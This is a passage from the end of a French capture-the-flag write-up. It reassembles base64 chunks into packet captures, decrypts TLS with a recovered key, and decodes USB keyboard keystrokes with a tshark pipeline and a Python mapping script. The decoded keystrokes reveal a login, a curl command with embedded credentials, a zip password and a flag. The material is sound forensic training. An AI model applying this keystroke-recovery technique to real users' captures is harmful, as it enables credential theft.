'AAAAAwEAAAAAAAAAAAAAAAAAAAAAAAAAAABSB3pZXbcLAEAAAABAAAAAwAotCgCI__9TAgACBAAAAFIHelkAAAAAXbcLAI3___8AAAAAAAAAACMIMpABAAAAAAAAAAAAAAAAAAAAAAAAAFIHelkPuAsAQAAAAEAAAADACi0KAIj__0MCAAIEAC0-Ugd6WQAAAAAPuAsAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAUgd6WQ25CwBAAAAAQAAAAMB6_jYAiP__QwIAAwQALT5SB3pZAAAAAA25CwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABSB3pZKrkLAEAAAABAAAAAwHr-NgCI__9TAgACBAAAAFIHelkAAAAAKrkLAI3___8AAAAAAAAAACMDAgAFAAAAAAAAAAAAAAAAAAAAAAAAAFIHellYuQsAQAAAAEAAAADAev42AIj__0MCAAIEAC0-Ugd6WQAAAABYuQsAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAVAd6WYsmAABIAAAASAAAAMAqDykAiP__QwGBBQQALQBUB3pZAAAAAIsmAAAAAAAACAAAAAgAAAAAAAAAAAAAAAgAAAAAAAAABAIAAAAAAAAAABUAAAAAAFQHelnjJgAAQAAAAEAAAADAKg8pAIj__1MBgQUEAC08VAd6WQAAAADjJgAAjf___wgAAAAAAAAAAAAAAAAAAAAIAAAAAAAAAAQCAAAAAAAAVAd6WYud']
['getfile', '30', 'AAAAAAAAAAAAAAgAAAAAAAAABAIAAAAAAAAAABcAAAAAAHAHelk5PAcAQAAAAEAAAADAKg8pAIj__1MBgQUEAC08cAd6WQAAAAA5PAcAjf___wgAAAAAAAAAAAAAAAAAAAAIAAAAAAAAAAQCAAAAAAAAcAd6WaSzCABIAAAASAAAAMAqDykAiP__QwGBBQQALQBwB3pZAAAAAKSzCAAAAAAACAAAAAgAAAAAAAAAAAAAAAgAAAAAAAAABAIAAAAAAAAAAAAAAAAAAHAHelnpswgAQAAAAEAAAADAKg8pAIj__1MBgQUEAC08cAd6WQAAAADpswgAjf___wgAAAAAAAAAAAAAAAAAAAAIAAAAAAAAAAQCAAAAAAAAcQd6WfsuBABIAAAASAAAAMAqDykAiP__QwGBBQQALQBxB3pZAAAAAPsuBAAAAAAACAAAAAgAAAAAAAAAAAAAAAgAAAAAAAAABAIAAAAAAAACAAAAAAAAAHEHelk6LwQAQAAAAEAAAADAKg8pAIj__1MBgQUEAC08cQd6WQAAAAA6LwQAjf___wgAAAAAAAAAAAAAAAAAAAAIAAAAAAAAAAQCAAAAAAAAcQd6WTLsCQBIAAAASAAAAMAqDykAiP__QwGBBQQALQBxB3pZAAAAADLsCQAAAAAACAAAAAgAAAAAAAAAAAAAAAgAAAAAAAAABAIAAAAAAAACADMAAAAAAHEHell77AkAQAAAAEAAAADAKg8pAIj__1MBgQUEAC08cQd6WQAAAAB77AkAjf___wgAAAAAAAAAAAAAAAAA']
['getfile', '7', 'LQBWB3pZAAAAAKQmAAAAAAAACAAAAAgAAAAAAAAAAAAAAAgAAAAAAAAABAIAAAAAAAAAACgAAAAAAFYHeln0JgAAQAAAAEAAAADAKg8pAIj__1MBgQUEAC08Vgd6WQAAAAD0JgAAjf___wgAAAAAAAAAAAAAAAAAAAAIAAAAAAAAAAQCAAAAAAAAVgd6WYMaAgBIAAAASAAAAMAqDykAiP__QwGBBQQALQBWB3pZAAAAAIMaAgAAAAAACAAAAAgAAAAAAAAAAAAAAAgAAAAAAAAABAIAAAAAAAAAAAAAAAAAAFYHelnTGgIAQAAAAEAAAADAKg8pAIj__1MBgQUEAC08Vgd6WQAAAADTGgIAjf___wgAAAAAAAAAAAAAAAAAAAAIAAAAAAAAAAQCAAAAAAAAVwd6WX9yAwBIAAAASAAAAMAqDykAiP__QwGBBQQALQBXB3pZAAAAAH9yAwAAAAAACAAAAAgAAAAAAAAAAAAAAAgAAAAAAAAABAIAAAAAAAACAAAAAAAAAFcHelnCcgMAQAAAAEAAAADAKg8pAIj__1MBgQUEAC08Vwd6WQAAAADCcgMAjf___wgAAAAAAAAAAAAAAAAAAAAIAAAAAAAAAAQCAAAAAAAAVwd6WTusCQBIAAAASAAAAMAqDykAiP__QwGBBQQALQBXB3pZAAAAADusCQAAAAAACAAAAAgAAAAAAAAAAAAAAAgAAAAAAAAABAIAAAAAAAACABoAAAAAAFcHelmMrAkAQAAAAEAAAADAKg8pAIj__1MBgQUEAC08Vwd6WQAA']
['getfile', '46', 'AAAAAAAAAAAAAH8HelkRtg0AQAAAAEAAAADAKg8pAIj__1MBgQUEAC08fwd6WQAAAAARtg0Ajf___wgAAAAAAAAAAAAAAAAAAAAIAAAAAAAAAAQCAAAAAAAAgAd6WRVnAABIAAAASAAAAMAqDykAiP__QwGBBQQALQCAB3pZAAAAABVnAAAAAAAACAAAAAgAAAAAAAAAAAAAAAgAAAAAAAAABAIAAAAAAAAAABcAAAAAAIAHellFZwAAQAAAAEAAAADAKg8pAIj__1MBgQUEAC08gAd6WQAAAABFZwAAjf___wgAAAAAAAAAAAAAAAAAAAAIAAAAAAAAAAQCAAAAAAAAgAd6WYGfAQBIAAAASAAAAMAqDykAiP__QwGBBQQALQCAB3pZAAAAAIGfAQAAAAAACAAAAAgAAAAAAAAAAAAAAAgAAAAAAAAABAIAAAAAAAAAAAAAAAAAAIAHelmmnwEAQAAAAEAAAADAKg8pAIj__1MBgQUEAC08gAd6WQAAAACmnwEAjf___wgAAAAAAAAAAAAAAAAAAAAIAAAAAAAAAAQCAAAAAAAAgAd6WTMMCgBIAAAASAAAAMAqDykAiP__QwGBBQQALQCAB3pZAAAAADMMCgAAAAAACAAAAAgAAAAAAAAAAAAAAAgAAAAAAAAABAIAAAAAAAAAADcAAAAAAIAHelmBDAoAQAAAAEAAAADAKg8pAIj__1MBgQUEAC08gAd6WQAAAACBDAoAjf___wgAAAAAAAAAAAAAAAAAAAAIAAAAAAAAAAQCAAAAAAAAgAd6WVGD']
...

On réordonne les base64 et on reconstruit les deux fichiers.
intranet.pcap contient du traffic TLS.
usb.pcap contient une capture de clavier USB.

On déchiffre le traffic TLS avec la clé privée précédente. Et on récupère une archive secret.zip protégée par mot de passe.

Puis à l'aide du script suivant on extrait les frappes clavier:

#tshark -r intranet.pcap -T fields -e usb.capdata | cut -d ':' -f 1-3 | sed -e "s/00:00:00//g" | sed -e "s/02:00:/20/g" | sed -e "s/00:00:/00/g" | sed -e "s/2000//g" > keys.txt

mappings = {'2004':'A','2005':'B','2006':'C','2007':'D','2008':'E','2009':'F','200a':'G','200b':'H','200c':'I','200d':'J','200e':'K','200f':'L','2010':'M','2011':'N','2012':'O','2013':'P','2014':'Q','2015':'R','2016':'S','2017':'T','2018':'U','2019':'V','201a':'W','201b':'X','201c':'Y','201d':'Z','201e':'!','201f':'@','2020':'#','2021':'$','2022':'%','2023':'^','2024':'&','2025':'*','2026':'','2027':'','202d':'_','202e':'+','202f':'{','2030':'}','2031':'|','2033':':','2034':'"','2035':'~','2036':'<','2037':'>','2038':'/','0004':'a','0005':'b','0006':'c','0007':'d','0008':'e','0009':'f','000a':'g','000b':'h','000c':'i','000d':'j','000e':'k','000f':'l','0010':'m','0011':'n','0012':'o','0013':'p','0014':'q','0015':'r','0016':'s','0017':'t','0018':'u','0019':'v','001a':'w','001b':'x','001c':'y','001d':'z','001e':'1','001f':'2','0020':'3','0021':'4','0022':'5','0023':'6','0024':'7','0025':'8','0026':'9','0027':'0','0028':'\n','002c':" ",'002d':'-','002e':'=','002f':'[','0030':']','0031':'\\','0033':';','0034':'\'','0035':'`','0036':',','0037':'.','0038':'/'}
nums = []
keys = open('keys.txt')
for line in keys:
        if line.strip()!='':
            nums.append(line.strip())
keys.close()

output = ""
for n in nums:
        if n in mappings:
                output += mappings[n]
        else:
                output += 'x'

print 'Some x can be not found keys :\n\n' + output
root
Welcome123
ls -la
curl -ks https://root:Welcome123@intranet/secret.zip
unzip secret.zip
Pyj4m4P4rtY@2017
cat secret.txt
display hamburgx
xlogoout

Avec ces infos il ne nous reste plus qu'à décompresser secret.zip et récupérer le flag ! :D

$ cat secret.txt 
Important passwords:
secret.zip	Pyj4m4P4rtY@2017
root		Welcome123
flag	        flag{bf107b7f64f320034df7e48669439f69}